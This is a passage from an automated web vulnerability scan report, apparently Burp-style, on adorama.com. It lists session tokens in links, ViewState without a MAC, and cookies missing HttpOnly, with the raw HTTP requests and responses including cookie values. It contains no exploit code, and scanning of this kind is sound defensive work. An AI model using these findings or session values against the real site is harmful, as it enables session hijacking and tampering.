2.5. http://www.adorama.com/ICA1DM4.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /ICA1DM4.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ICA1DM4.html?utm_term=Other&utm_medium=Others&utm_campaign=Other&utm_source=become HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AJAXrefby=become; sterm=; refby=become; header_refby=become; Session_Refby=become

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 04:08:53 GMT
Connection: close
Set-Cookie: ABFlag=89; expires=Wed, 26-Dec-2040 04:08:51 GMT; path=/
Set-Cookie: sub=; path=/
Set-Cookie: sterm=; path=/
Set-Cookie: refby=; path=/
Set-Cookie: ETjobid=; path=/
Content-Length: 91600

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.6. http://www.adorama.com/ICA1DM4KA.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /ICA1DM4KA.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ICA1DM4KA.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
X-Powered-By: PipeBoost/2.1
Server: Microsoft-IIS/6.0
ServerID: 3
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93278

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.7. http://www.adorama.com/ICAACKE4.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /ICAACKE4.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ICAACKE4.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 8
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41119

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.8. http://www.adorama.com/ICALPE4.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /ICALPE4.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ICALPE4.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 15
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47580

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.9. http://www.adorama.com/IDSCFEP8G60M.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /IDSCFEP8G60M.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /IDSCFEP8G60M.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 6
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59944

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.10. http://www.adorama.com/IDSSDX316G.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /IDSSDX316G.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /IDSSDX316G.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60237

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.11. http://www.adorama.com/IMXWP129.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /IMXWP129.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /IMXWP129.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 6
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42994

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.12. http://www.adorama.com/IMXWP179.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /IMXWP179.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /IMXWP179.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42994

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.13. http://www.adorama.com/LPRZTLZ20BK.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /LPRZTLZ20BK.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /LPRZTLZ20BK.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 14
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41860

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.14. http://www.adorama.com/catalog.tpl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /catalog.tpl?op=print_details&sku=ICA1DM4 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:31:34 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:31:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 70381

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

3. ASP.NET ViewState without MAC enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /alc/

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /alc/ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Pragma: no-cache
Server: Microsoft-IIS/6.0
Expires: -1
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=ejs4jy45twoamg45mtedxz45; path=/; HttpOnly
Set-Cookie: sid3=20101225230855189ky; expires=Wed, 26-Dec-2040 04:33:32 GMT; path=/
Set-Cookie: KeepLoggedIn=false; expires=Wed, 26-Dec-2040 04:33:32 GMT; path=/
Content-Length: 98406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-- -->

...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTg1NDA0NTM3OWQYCgVPY3RsMDAkYm9keSR0YWJWaWV3JHBvc3RzVGFiVmlldyROZXdDb250ZW50JHJlcFBvc3RzJGN0bDA3JHBvc3RDb250ZW50JG11bHRpVmlldw8PZGZkBU9jdGwwMCRib2R5JHRhYlZpZXckcG9zdHNUYWJWaWV3JE5ld0NvbnRlbnQkcmVwUG9zdHMkY3RsMDAkcG9zdENvbnRlbnQkbXVsdGlWaWV3Dw9kZmQFT2N0bDAwJGJvZHkkdGFiVmlldyRwb3N0c1RhYlZpZXckTmV3Q29udGVudCRyZXBQb3N0cyRjdGwwNiRwb3N0Q29udGVudCRtdWx0aVZpZXcPD2RmZAVPY3RsMDAkYm9keSR0YWJWaWV3JHBvc3RzVGFiVmlldyROZXdDb250ZW50JHJlcFBvc3RzJGN0bDAxJHBvc3RDb250ZW50JG11bHRpVmlldw8PZGZkBU9jdGwwMCRib2R5JHRhYlZpZXckcG9zdHNUYWJWaWV3JE5ld0NvbnRlbnQkcmVwUG9zdHMkY3RsMDMkcG9zdENvbnRlbnQkbXVsdGlWaWV3Dw9kZmQFT2N0bDAwJGJvZHkkdGFiVmlldyRwb3N0c1RhYlZpZXckTmV3Q29udGVudCRyZXBQb3N0cyRjdGwwOSRwb3N0Q29udGVudCRtdWx0aVZpZXcPD2RmZAVPY3RsMDAkYm9keSR0YWJWaWV3JHBvc3RzVGFiVmlldyROZXdDb250ZW50JHJlcFBvc3RzJGN0bDA0JHBvc3RDb250ZW50JG11bHRpVmlldw8PZGZkBU9jdGwwMCRib2R5JHRhYlZpZXckcG9zdHNUYWJWaWV3JE5ld0NvbnRlbnQkcmVwUG9zdHMkY3RsMDgkcG9zdENvbnRlbnQkbXVsdGlWaWV3Dw9kAgJkBU9jdGwwMCRib2R5JHRhYlZpZXckcG9zdHNUYWJWaWV3JE5ld0NvbnRlbnQkcmVwUG9zdHMkY3RsMDIkcG9zdENvbnRlbnQkbXVsdGlWaWV3Dw9kZmQFT2N0bDAwJGJvZHkkdGFiVmlldyRwb3N0c1RhYlZpZXckTmV3Q29udGVudCRyZXBQb3N0cyRjdGwwNSRwb3N0Q29udGVudCRtdWx0aVZpZXcPD2QCAWQ=" />
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 7 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.adorama.com/ICA1DM4.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /ICA1DM4.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ICA1DM4.html?refby=become HTTP/1.1
Host: www.adorama.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Location: http://www.adorama.com/ICA1DM4.html?utm_term=Other&utm_medium=Others&utm_campaign=Other&utm_source=become
ServerID: 16
X-Powered-By: ASP.NET
Cache-Control: private
Content-Length: 0
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:08:52 GMT
Connection: close
Set-Cookie: AJAXrefby=become; path=/
Set-Cookie: sterm=; path=/
Set-Cookie: refby=become; expires=Tue, 25-Jan-2011 04:08:53 GMT; path=/
